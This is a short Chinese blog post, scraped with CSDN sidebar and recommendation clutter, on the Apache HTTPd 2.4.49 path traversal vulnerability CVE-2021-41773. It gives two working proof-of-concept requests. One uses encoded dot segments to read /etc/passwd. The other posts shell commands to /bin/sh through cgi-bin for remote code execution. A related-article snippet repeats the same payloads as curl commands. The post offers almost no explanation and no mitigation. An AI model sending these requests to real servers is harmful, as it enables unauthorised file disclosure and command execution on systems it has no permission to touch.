Apache HTTPd 2.4.49 CVE-2021-41773路径穿越

已于 2022-10-19 10:13:23 修改
阅读量131 收藏
点赞数 1
分类专栏: Apache 文章标签: apache
于 2022-10-19 10:11:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guishengyx/article/details/127402174
版权

该漏洞允许攻击者绕过路径遍历保护,使用编码并读取网络服务器文件系统上的任意文件。

POC1:

GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1

POC2:

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1

echo; ls

 

AlienStar
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013)
weixin_47311099的博客
12-07 2288
Apache HTTP Server 2.4.50 路径穿越漏洞(CVE-2021-42013) Apache官方在2.4.50版本中对2.4.49版本中出现的目录穿越漏洞CVE-2021-41773进行了修复,但这个修复是不完整的,CVE-2021-42013是对补丁的绕过。 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 这个漏洞可以影响Apache HTTP Server 2.4.49
Apache HTTP Server 2.4.49 路径穿越与命令执行漏洞(CVE-2021-41773)
weixin_44047654的博客
12-07 395
Apache HTTP Server 2.4.49 路径穿越与命令执行漏洞(CVE-2021-41773)
Apache HTTP Server 2.4.49 中的路径遍历和文件泄露漏洞 (CVE-2021-41773
最新发布
weixin_53639243的博客
02-27 361
如果这些目录之外的文件不受通常的默认配置“require all denied”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程执行代码。在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。Apache HTTP 服务器项目旨在为现代操作系统(包括 UNIX 和 Windows)开发和维护开源 HTTP 服务器。发送到重发器,进行改包操作。
安装Apache Httpd 2.4.9
adr5970的博客
05-27 90
安装最新版的Httpdserver。提前要做的准备,安装依赖包。 yum install gcc yum install make yum install openssl-devel yum install pcre-devel 下载Httpd 2.4.9 http://httpd.apache.org/download.cgi 下载Apr和Apr-util...
2022DASCTF MAY web
weixin_63231007的博客
07-20 468
命令"'目标地址端口/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'curl-v--path-as-is目标地址端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd。所有需要我们上传一个users.go文件,然后其执行,我们访问users,会返回文件执行结果。......
apache-httpd-2.4.58-win64-VS17.zip
12-15
标题 "apache-httpd-2.4.58-win64-VS17.zip" 指的是 Apache HTTP 服务器的2.4.58版本,适用于64位Windows操作系统,并且是使用Visual Studio 2017编译的。这个压缩包包含了一系列用于在Windows平台上搭建和运行...
httpd-2.4.49-o111l-x64-vc15.zip
11-23
这个名为“httpd-2.4.49-o111l-x64-vc15.zip”的压缩包文件,是专为Windows操作系统设计的64位版本,基于Apache 2.4.49稳定版,并使用Visual C++ 15编译器(即Visual Studio 2017)编译。此版本添加了O111L扩展,...
httpd-2.4.46-win64-VS16.zip
01-07
Apache服务器httpd-2.4.46在Win64环境下的安装与配置详解》 Apache HTTP Server,简称Apache,是世界上最流行的Web服务器软件之一,以其开源、免费、稳定和高度可定制性赢得了广大用户的青睐。在Windows 64位操作...
apachehttpd-2.4.52-o111m-x86-vc15
02-15
【标题】"apachehttpd-2.4.52-o111m-x86-vc15"指的是Apache HTTP服务器的特定版本,这个版本是2.4.52,适用于32位(x86)系统,并且是用Visual C++ 15编译器(VC15)构建的。Apache HTTP服务器是世界上最流行的Web...
apache httpd-2.4.3 安装所需的包
02-27
apache httpd-2.4.3 安装所需的包,里面包含了: apache 安装包:httpd-2.4.3.tar.gz 依赖的包:apr-1.4.6.tar.gz、apr-util-1.4.1.tar.gz、pcre-8.20.tar.bz2
Apache HTTP Server 2.4.50路径穿越以及远程代码执行(CVE-2021-42103)
m0_58596609的博客
12-28 709
Apache HTTP Server 2.4.50路径穿越以及远程代码执行(CVE-2021-42103)
Apahce HTTPd 2.4.49/2.4.50(CVE-2021-42013)漏洞复现详细教程
W小哥
10-14 3593
一、漏洞描述 Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置 “要求全部拒绝” 的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。 二、影响版本 Apache 2.4.49Apache 2.4.50 三、靶场准备 本实验使用vulhub环境,节约搭建时间 mkdir Docker
apache-httpd_2.4.49_path-traversal_CVE-2021-41773
acdcccc的博客
09-07 169
Apache httpd 2.4.49 路径穿越漏洞
CVE-2021-41773CVE-2021-42013检测脚本
dreamthe的博客
12-04 1351
自己在家写的简单的脚本检测,没有多么炫酷,代码的备注都给你们写的好好的,给小女点个赞再走咯。为啥使用urllib不要request模块是因为在写的时候发现request模块会将url进行转码。所以使用比较老的urllib模块。 #!/usr/bin/env python3 # -*- coding: utf-8 -*- # author: trance # datetime: 2021/12/2 0002 22:29 # !/usr/bin/env python3 # -*- coding: utf-8
【漏洞复现】Apache HTTP Server 2.4.492.4.50 RCE(CVE-2021-41773
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
10-22 837
Apache HTTP Server是一个开源、跨平台的Web服务器,它在全球范围内被广泛使用。2021年10月5日,Apache发布更新公告,修复了Apache HTTP Server2.4.49中的一个路径遍历和文件泄露漏洞(CVE-2021-41773)。攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。
Apache HTTPd 2.4.49 路径穿越漏洞(CVE-2021-41773)复现
weixin_59086772的博客
12-10 2493
0x00 漏洞概述 2021年10月5日,Apache官方发布了一批漏洞信息,其中Apache HTTP Server路径穿越漏洞CVE-2021-41773。 满足条件: 版本等于2.4.49 穿越的目录允许被访问,比如配置了Require all granted。(默认情况下是不允许的) 0x01环境搭建 使用docker搭建Apache HTTPd 2.4.49版本服务器: Dockerfile FROM vulhub/httpd:2.4.49 LABEL mai
linux下安装apachehttpd-2.4.3版本)各种坑
happy_boys_的专栏
04-23 5103
linux下安装apachehttpd-2.4.3版本)各种坑
Apache httpd-2.4.46 安装过程 
huofeige
04-06 957
1.下载httpd-2.4.46把httpd-2.4.10.tar.gz放到/root 2.进入roottar -zxvf httpd-2.4.10.tar.gz //解压apache的压缩包 3.cd httpd-2.4.10 //定位到httpd-2.4.10 文件夹下 4../configure --help | more)//查看安装apache配置参数 5../configure --prefix=/usr/local/apache --enable-so 出现:configu...
Apache HTTP Server 2.4.49 路径穿越漏洞(CVE-2021-41773
weixin_45366453的博客
07-21 790
Apache HTTP Server 2.4.49 路径穿越漏洞(CVE-2021-41773
httpd-2.4.46-o111k-x64 配置
09-08
httpd-2.4.46-o111k-x64是一个用于部署和运行Apache HTTP服务器的软件包。 首先,要进行httpd-2.4.46-o111k-x64的配置,需要使用一个文本编辑器打开所安装的httpd.conf文件。该文件位于Apache安装目录下的conf...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值